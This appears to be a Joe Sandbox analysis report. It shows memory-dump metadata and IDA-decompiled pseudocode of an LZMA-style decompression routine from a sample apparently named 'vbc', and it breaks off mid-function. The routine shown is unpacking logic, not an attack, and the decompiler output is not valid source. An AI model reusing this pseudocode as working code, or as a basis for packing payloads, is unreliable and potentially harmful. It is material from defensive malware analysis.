                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x004068d2
                          0x004068d8
                          0x004068da
                          0x004068e1
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                          • Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
                          • Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                          • Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004062EB Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                          Download Yara Rule
                          C-Code - Quality: 98%
                          			E004062EB() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
